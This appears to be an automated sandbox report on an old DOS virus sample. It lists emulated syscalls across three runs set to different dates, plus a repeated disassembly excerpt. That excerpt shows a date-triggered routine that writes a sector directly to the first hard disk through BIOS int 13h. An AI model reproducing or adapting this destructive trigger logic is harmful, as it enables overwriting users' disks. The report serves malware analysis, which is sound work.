Sample viewer

vx.netlux.org/Virus.DOS.Zxx.600

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:25:27.573006265Z 48 PC: 12c4e | Get DOS version
2018-12-17T22:25:27.57795665Z 42 PC: 12c56 | Get date 0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-17T22:25:27.580813444Z 37 PC: 12c64 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:25:27.911695389Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-17T22:25:27.917722585Z 76 PC: 12c28 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:54.768424928Z 48 PC: 12c4e | Get DOS version
2018-12-25T11:51:54.769675955Z 42 PC: 12c56 | Get date 0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-25T11:51:54.772139645Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-25T11:51:54.777225751Z 76 PC: 12c28 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4495,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:54.948926756Z 48 PC: 12c4e | Get DOS version
2018-12-25T11:51:54.950064056Z 42 PC: 12c56 | Get date 0x12c56: cmp dh, 8
0x12c59: jb 0x12c75
0x12c5b: mov ah, 0x13
0x12c5d: int 0x2f
0x12c5f: mov ax, 0x2513
0x12c62: int 0x21
0x12c64: mov ah, 0x13
0x12c66: int 0x2f
0x12c68: mov dx, 0x80
0x12c6b: mov cx, 1
0x12c6e: mov ax, 0x301
0x12c71: int 0x13
0x12c73: jmp 0x12cc0
0x12c75: xor di, di
0x12c77: mov es, di
0x12c79: mov es, word ptr es:[0x540]
0x12c7e: xor si, si
0x12c80: mov cx, 0x14
0x12c83: repe cmpsb byte ptr [si], byte ptr es:[di]
0x12c85: je 0x12cc0
2018-12-25T11:51:54.953645515Z 37 PC: 12c64 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T11:51:55.65523463Z 9 PC: 12c22 | Display string (Could not find end pointer)
2018-12-25T11:51:55.66212492Z 76 PC: 12c28 | Terminate with return code (Return code = '0')